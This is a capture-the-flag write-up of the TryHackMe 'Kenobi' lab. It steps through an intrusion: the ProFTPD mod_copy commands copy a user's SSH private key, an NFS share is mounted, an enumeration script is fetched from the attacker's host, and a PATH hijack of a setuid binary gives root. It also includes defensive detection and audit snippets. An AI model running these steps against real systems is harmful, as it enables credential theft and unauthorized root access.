TryHackMe: Kenobi

Hi, friend. We meet again!

You can find this room here

Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation.

This room is beginner level; most of the time you will have a useful guide for every task.

You want that flag? You have to go through me first!

[Task 1]: Deploy The Vulnerable Machine & Perform Reconnaissance

First, let’s perform an nmap scan on the target:

root@kalibox:~/kenobi# nmap -p- --min-rate=1000 10.10.153.194 -oA nmap/quickscan

#result
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
37677/tcp open unknown
40235/tcp open unknown
45809/tcp open unknown
58671/tcp open unknown
Note: just keep in mind that --min-rate=1000 should only be used in CTF competitions, because it makes a lot of noise!

From the result of our first scan, we can see 11 open ports; now run a second, version-detection scan against those known ports:

root@kalibox:~/kenobi# nmap -sV -p21,22,80,111,139,445,2049,37677,40235,45809,58671 -oA nmap/optimize_scan 10.10.153.194

#result:
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
37677/tcp open mountd 1-3 (RPC #100005)
40235/tcp open mountd 1-3 (RPC #100005)
45809/tcp open nlockmgr 1-4 (RPC #100021)
58671/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Right now there are 4 ports I’m interested in: ports 21, 22, 80 and 445.

Let’s visit the webpage:

Ah, I’m a fan of Star Wars

Taking a look at the page source turns up nothing:

no hidden note for you Neo…

Looks like there is nothing interesting on this site; let’s move on to the other ports…

[Task 2]: Enumerating Samba For Shares

From our nmap scan, we have Samba running on ports 139 & 445; let’s list the file shares on the host:

root@kalibox:~/kenobi# smbclient -L 10.10.153.194
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We have 3 shares available; let’s take a look at the anonymous share:

root@kalibox:~# smbclient \\\\10.10.153.194\\anonymous
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 17:49:09 2019
.. D 0 Wed Sep 4 17:56:07 2019
log.txt N 12237 Wed Sep 4 17:49:09 2019

9204224 blocks of size 1024. 6877104 blocks available
smb: \>

There is a text file; download it to your machine.

Let’s read some part of the file:

root@kalibox:~# cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi
The key's randomart image is:
+---[RSA 2048]----+
| |
| .. |
| . o. . |
| ..=o +. |
| . So.o++o. |
| o ...+oo.Bo*o |
| o o ..o.o+.@oo |
| . . . E .O+= . |
| . . oBo. |
+----[SHA256]-----+

Further down, we have a potential username:

# Set the user and group under which the server will run.
User kenobi
Group kenobi

From this file we know:

  • Information generated for Kenobi when generating an SSH key for the user
  • Information about the ProFTPD server.

Run another nmap scan against port 111 with the NFS scripts:

root@kalibox:~# nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.153.194
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-16 14:20 +07
Nmap scan report for 10.10.153.194
Host is up (0.33s latency).

PORT STATE SERVICE
111/tcp open rpcbind
| nfs-ls: Volume /var
| access: Read Lookup NoModify NoExtend NoDelete NoExecute
| PERMISSION UID GID SIZE TIME FILENAME
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 .
| rwxr-xr-x 0 0 4096 2019-09-04T12:27:33 ..
| rwxr-xr-x 0 0 4096 2019-09-04T12:09:49 backups
| rwxr-xr-x 0 0 4096 2019-09-04T10:37:44 cache
| rwxrwxrwt 0 0 4096 2019-09-04T08:43:56 crash
| rwxrwsr-x 0 50 4096 2016-04-12T20:14:23 local
| rwxrwxrwx 0 0 9 2019-09-04T08:41:33 lock
| rwxrwxr-x 0 108 4096 2019-09-04T10:37:44 log
| rwxr-xr-x 0 0 4096 2019-01-29T23:27:41 snap
| rwxr-xr-x 0 0 4096 2019-09-04T08:53:24 www
|_
| nfs-showmount:
|_ /var *
| nfs-statfs:
| Filesystem 1K-blocks Used Available Use% Maxfilesize Maxlink
|_ /var 9204224.0 1836528.0 6877100.0 22% 16.0T 32000

Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

We can see that the /var export is available to any host (*).

[Task 3]: Gain Initial Access With ProFtpd

ProFtpd is a free and open-source FTP server, compatible with Unix and Windows systems. It has also been vulnerable in past versions.

We already have the version of the ProFTPd service:

PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5

Using searchsploit you can find a few exploits for this version:

root@kalibox:~/kenobi# searchsploit proftpd 1.3.5
------------------------------------------------------------ -------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------ -------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)    | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution          | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)      | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                    | linux/remote/36742.txt
------------------------------------------------------------ -------------------------
Shellcodes: No Results

The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files/directories from one place to another on the server. Any unauthenticated client can leverage these commands to copy files from any part of the filesystem to a chosen destination.

Let's put those exploits aside; we can do this by hand.

Connect to port 21 with netcat:

root@kalibox:~/kenobi# nc 10.10.153.194 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.153.194]
ls
500 LS not understood
help
214-The following commands are recognized (* =>'s unimplemented):
CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV
EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD
XRMD MKD XMKD PWD XPWD SIZE SYST HELP
NOOP FEAT OPTS AUTH* CCC* CONF* ENC* MIC*
PBSZ* PROT* TYPE STRU MODE RETR STOR STOU
APPE REST ABOR USER PASS ACCT* REIN* LIST
NLST STAT SITE MLSD MLST
214 Direct comments to root@kenobi

We're now going to copy Kenobi's private key using the SITE CPFR and SITE CPTO commands:

SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTD /var/tmp/id_rsa
500 'SITE CPTD' not understood
SITE CPTO /var/tmp/id_rsa
250 Copy successful
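From the defender's side, the same SITE CPFR / CPTO exchange is easy to spot in the FTP server's command log. The shell snippet below is an added example, not part of this write-up or of ProFTPD itself; it assumes a simplified one-command-per-line log format and an allowed copy root of /srv/ftp, both constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the original write-up: flag SITE CPFR / CPTO use
# that should never happen on a healthy ProFTPD server. The log format is a
# constructed simplification (assumption): one command per line,
#   <time> <session-id> <client-ip> <reply-code> <command> [args...]
# Adjust the field numbers to your own ExtendedLog / LogFormat layout.

# Assumption: legitimate copies must stay under this tree (your DefaultRoot).
ALLOWED_ROOT=/srv/ftp

# Reads log lines on stdin, prints one ALERT line per suspicious copy command.
# A copy is suspicious when the session never received a "230" (PASS accepted)
# reply before issuing it, or when its path argument leaves ALLOWED_ROOT.
detect_copy_abuse() {
    awk -v root="$ALLOWED_ROOT" '
        # remember sessions that completed a login
        $5 == "PASS" && $4 == 230 { authed[$2] = 1; next }
        $5 == "SITE" && ($6 == "CPFR" || $6 == "CPTO") {
            reason = ""
            if (!authed[$2])                    reason = "unauthenticated"
            else if (index($7, root "/") != 1)  reason = "outside " root
            if (reason != "")
                printf "ALERT session=%s client=%s %s %s %s (%s)\n", $2, $3, $5, $6, $7, reason
        }'
}

# Constructed sample: session s1 mirrors the copy shown above with no login,
# s2 is a normal authenticated copy, s3 is a logged-in user reaching for /etc.
SAMPLE_LOG='2021-09-16T14:36:01 s1 10.11.43.240 350 SITE CPFR /home/kenobi/.ssh/id_rsa
2021-09-16T14:36:05 s1 10.11.43.240 250 SITE CPTO /var/tmp/id_rsa
2021-09-16T14:40:10 s2 10.0.0.7 331 USER kenobi
2021-09-16T14:40:11 s2 10.0.0.7 230 PASS ****
2021-09-16T14:40:20 s2 10.0.0.7 350 SITE CPFR /srv/ftp/pub/notes.txt
2021-09-16T14:40:21 s2 10.0.0.7 250 SITE CPTO /srv/ftp/pub/notes.bak
2021-09-16T14:45:00 s3 10.0.0.9 331 USER guest
2021-09-16T14:45:01 s3 10.0.0.9 230 PASS ****
2021-09-16T14:45:09 s3 10.0.0.9 350 SITE CPFR /etc/passwd
2021-09-16T14:45:10 s3 10.0.0.9 250 SITE CPTO /srv/ftp/pub/p.txt'

# Run the detector over the constructed sample; against a real log use:
#   detect_copy_abuse < proftpd.log
scan_sample() {
    printf '%s\n' "$SAMPLE_LOG" | detect_copy_abuse
}

scan_sample
```

The sample produces three alerts: both unauthenticated commands from s1 and the /etc/passwd source from s3, while s2 stays silent.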

After that, mount the exported /var directory on our machine:

root@kalibox:~# mkdir /mnt/kenobi
root@kalibox:~# mount 10.10.153.194:/var /mnt/kenobi
root@kalibox:~# ls -la /mnt/kenobi/
total 56
drwxr-xr-x 14 root root 4096 Sep 4 2019 .
drwxr-xr-x 4 root root 4096 Sep 16 14:29 ..
drwxr-xr-x 2 root root 4096 Sep 4 2019 backups
drwxr-xr-x 9 root root 4096 Sep 4 2019 cache
drwxrwxrwt 2 root root 4096 Sep 4 2019 crash
drwxr-xr-x 40 root root 4096 Sep 4 2019 lib
drwxrwsr-x 2 root staff 4096 Apr 13 2016 local
lrwxrwxrwx 1 root root 9 Sep 4 2019 lock -> /run/lock
drwxrwxr-x 10 root crontab 4096 Sep 4 2019 log
drwxrwsr-x 2 root mail 4096 Feb 27 2019 mail
drwxr-xr-x 2 root root 4096 Feb 27 2019 opt
lrwxrwxrwx 1 root root 4 Sep 4 2019 run -> /run
drwxr-xr-x 2 root root 4096 Jan 30 2019 snap
drwxr-xr-x 5 root root 4096 Sep 4 2019 spool
drwxrwxrwt 6 root root 4096 Sep 16 14:03 tmp
drwxr-xr-x 3 root root 4096 Sep 4 2019 www

List the contents of tmp (the target’s /var/tmp) and you can see kenobi’s private key:

root@kalibox:~# ls -l /mnt/kenobi/tmp
total 20
-rw-r--r-- 1 retr0 retr0 1675 Sep 16 14:36 id_rsa
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-2408059707bc41329243d2fc9e613f1e-systemd-timesyncd.service-a5PktM
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-6f4acd341c0b40569c92cee906c3edc9-systemd-timesyncd.service-z5o4Aw
drwx------ 3 root root 4096 Sep 16 14:03 systemd-private-95ad0d245f054e42b62dd0bda465b829-systemd-timesyncd.service-Oi8AM5
drwx------ 3 root root 4096 Sep 4 2019 systemd-private-e69bbb0653ce4ee3bd9ae0d93d2a5806-systemd-timesyncd.service-zObUdn

Copy id_rsa to your home folder and fix its permissions with this command:

chmod 600 id_rsa

Now you can log in as kenobi with this key via SSH:

kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
[This flag has been censored, you have to find it yourself]

[Task 4]: Privilege Escalation with Path Variable Manipulation

To make things more comfortable, let’s use a script called “Linux-Smart-Enumeration”.

On your attack box, serve the script with Python’s http.server module:

root@kalibox:/opt/LinuxPrivEsc/linux-smart-enumeration# python3 -m http.server 80

Note: if you have Python 2: python -m SimpleHTTPServer 80

On target machine, use wget to download the script:

kenobi@kenobi:~$ wget http://10.11.43.240/lse.sh

This will download the linux-smart-enumeration script from my box to kenobi.
Just make the script executable with chmod, let it run and grab a coffee.

The script will print out a lot of information; take your time to read it carefully.
Here is something unusual:

[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/menu

Run that binary and it shows 3 options:

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :

If you choose 3 it will output the result of the ifconfig command.
You can use the strings command to look for human-readable strings in a binary:

$ strings /usr/bin/menu

...

curl -I localhost
uname -r
ifconfig
Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
...

This shows us that the binary runs these commands without a full path (e.g. curl rather than /usr/bin/curl, uname rather than /usr/bin/uname). This means you can manipulate your PATH to gain a root shell, because the file runs with the root user’s privileges (it is setuid root).
Since it calls the curl binary without a full path, you can create a “fake” curl and change your PATH, so when we run the “menu” binary it will look for the “curl” binary in our chosen directory first!

kenobi@kenobi:~$ cd /tmp/
kenobi@kenobi:/tmp$ echo /bin/bash > curl
kenobi@kenobi:/tmp$ chmod 777 curl
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@kenobi:/tmp# whoami
root
root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
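To audit and fix a helper like /usr/bin/menu, the shell snippet below (an added example, not from the write-up or the room) shows the two checks a defender wants: which command strings will be resolved through the caller's PATH, and which file a bare name actually runs under a given PATH value, alongside a launcher that pins PATH so a prepended /tmp is never searched. TRUSTED_PATH and the function names are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original write-up: checks and the fix for a
# setuid helper that runs "curl -I localhost" / "uname -r" by bare name.

# Given command lines (for example the ones `strings` pulled out of the
# binary) on stdin, print those that name their program without a leading
# slash. Anything printed is resolved through the caller's PATH at run time.
bare_commands() {
    awk '$1 !~ /^\// { print }'
}

# Show which file a bare command name resolves to under a given PATH value,
# using the same first-match walk /bin/sh performs for system(): the first
# executable, non-directory entry wins. Prints nothing if there is no match.
resolve_under_path() {
    cmd=$1
    old_ifs=$IFS; IFS=:; set -- $2; IFS=$old_ifs
    for dir in "$@"; do
        [ -n "$dir" ] || continue   # empty entry means cwd; skipped here
        if [ -x "$dir/$cmd" ] && [ ! -d "$dir/$cmd" ]; then
            printf '%s\n' "$dir/$cmd"
            return 0
        fi
    done
    return 1
}

# The fix: a privileged program must not inherit the caller's environment.
# Start from an empty environment and a fixed PATH (assumed value), so a
# writable directory prepended by the caller, like /tmp above, is never searched.
TRUSTED_PATH=/usr/bin:/bin
run_pinned() {
    env -i PATH="$TRUSTED_PATH" "$@"
}

# Typical use (not run automatically):
#   strings /usr/bin/menu | bare_commands
#   resolve_under_path uname "/tmp:$PATH"
#   run_pinned uname -r
```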

Grab that flag and return to our ship commander!

root@kenobi:/tmp# cat /root/root.txt
======README======
Never Give You Up
Never Let You Down

#you think I'm gonna show the flag?

[Overview & Final Thought]

This is a good room for learning basic enumeration, exploitation and Linux privilege escalation. I just don’t feel fully satisfied, since this room includes a lot of guidance on how to solve the machine. After all, this is beginner level. I hope you have a nice time reading my write-up; expect more to come. Cheers!

Time to rewatch my childhood movie!

Hello friends, I’m Retr0. I’m currently learning InfoSec, and my main focus is penetration testing. I will post CTF write-ups here. Have fun reading!